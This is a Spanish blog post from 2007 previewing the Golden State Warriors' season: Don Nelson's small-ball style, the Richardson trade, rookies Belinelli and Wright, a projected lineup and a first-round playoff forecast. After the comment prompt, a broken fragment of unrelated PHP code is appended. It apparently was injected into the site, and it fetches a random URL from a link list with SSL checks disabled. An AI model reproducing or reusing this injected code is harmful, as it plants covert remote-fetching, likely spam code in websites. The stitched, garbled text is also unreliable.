Golden State Warriors: el rancho del tío Don

05 de October de 2007 por Viva_Dirk

En númerosas películas observamos cómo, cuando la familia pasa un fin de semana en el rancho del tío favorito, todo es felicidad, lo pasan en grande y adoran las tareas del campo; pero cuando alguna de estas familias es tan osada como para dejar la vida en la ciudad con sus normas sociales, el trabajo en la oficina y los inaguantables vecinos, el resultado es que acaban desquiciados y sin posibilidad de mejorar. En Golden State han pasado un gran ‘fin de semana’. Veremos cómo se adaptan a la vida en el rancho.

Hablar de los Warriors es hablar de Don Nelson, que normalmente se convierte en el primer referente de sus equipos. Su estilo es el más extremista de la liga: obsesión por anotar sea como sea, quintetos con jugadores pequeños y capaces de lanzar a canasta desde cualquier posición y una defensa poco trabajada son las señas de identidad del segundo entrenador con mas victorias en la historia de la NBA.

Esto ha hecho siempre que sus equipos sean peligrosos cuando la inspiración llama a su puerta, un desastre cuando el balón no entra ni en una piscina y por lo tanto conjuntos poco consistentes y perdedores cuando llegan los Playoffs (el balance de sus equipos es de 70-85). Los ejemplos son numerosos, pero en la retina de los aficionados de Oakland se encuentra sin duda la temporada 91-92, cuando el equipo liderado por Chris Mullin y Tim Hardaway, que había logrado un balance de 55-27 (el mejor de la franquicia en 15 años), cayó estrepitosamente ante los grises Sonics que tenían a Ricky Pierce como máxima estrella.

El verano ha convertido a los Warriors en un equipo más de futuro que de presente, dado que han traspasado a Jason Richardson, que durante años fue su jugador franquicia, a cambio del número 8 del último draft, Brandan Wright, el cual atesora un gran talento ofensivo pero del que no se espera que en su primer año sea capaz de ofrecer un gran rendimiento. También vía draft han incorporado al escolta Marco Belinelli, que encontrará en el estilo de Don Nelson lo que muchos novatos no encuentran en su llegada a la liga: confianza. El italiano es excelso tirador y posee unos fundamentos y cualidades ofensivas de altísimo nivel; si juntamos todos estos factores nos encontramos con uno de los candidatos a rookie del año (o a ser el mejor rookie… detrás de Durant). El resto de elecciones en el draft fueron Stephane Lasme, Kosta Perovic y Carlos Powell, que en teoria tendrán un papel marginal en su primer año en la liga.

De este modo se presenta la temporada 2007/08 en la bahía de Oakland, con el equipo liderado de nuevo por Baron Davis. El explosivo base nacido en Los Angeles realizó unos Playoffs de nivel MVP: más de 25 puntos, 4.5 rebotes, 6.5 asistencias y casi 3 robos de balon, con un acierto del 51% en tiros de campo, lideraron a Golden State a dar la gran sorpresa con la eliminación de los Mavs en primera ronda. La marcha de Jason Richardson parece pensada para dejar el puesto de escolta titular al ‘pequeñín’ Monta Ellis, que cuajó una gran temporada regular en la que era solo su segunda temporada en la liga; este año veremos cuál es su techo. En el puesto de alero estará otro de los grandes beneficiados del juego de Nelson, el anárquico Stephen Jackson, que fue una pesadilla para los Dallas Mavericks en la primera ronda de Playoffs pero que bajó considerablemente su rendimiento en la eliminatoria contra Utah. Será importante que Jackson encuentre cierta regularidad en sus actuaciones ya que es uno de los jugadores más veteranos. Las posiciones interiores siempre son una incógnita con Don Nelson, ya que el año pasado Al Harrington (que siempre había jugado de alero o ala-pívot abierto) disputó bastantes minutos en la posición de center, lo que supuso un bajón en los minutos disputados por Andris Biedrins; aun así, estos dos deberían conformar la pareja interior que comience los partidos.

Las rachas de los jugadores marcarán sus minutos de juego como ya sucediera el año pasado con Azubuike o Pietrus. El francés puede ocupar las posiciones de escolta y alero con igual rendimiento, le proporciona al equipo fuerza física y velocidad al contraataque, aunque la llegada de Belinelli reducirá sus minutos. Matt Barnes es otro que verá reducida su participación, tanto por Belinelli como por Wright, ya que jugó en la posición de ala-pívot cuando el small ball era la opción de Nelson. Un pívot de siete pies y claramente interior lo tiene muy difícil con el estilo actual de los Warriors, así que no se prevé un cambio en la importancia de Patrick O´Bryant en el roster. Troy Hudson, Azubuike y Croshere dependerán de las bajas y de sus propias actuaciones para ganarse un puesto en la rotación.

Quinteto: Baron Davis, Ellis, Jackson, Harrington y Biedrins
6º hombre: Pietrus/Belinelli

Pronóstico: Primera ronda de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>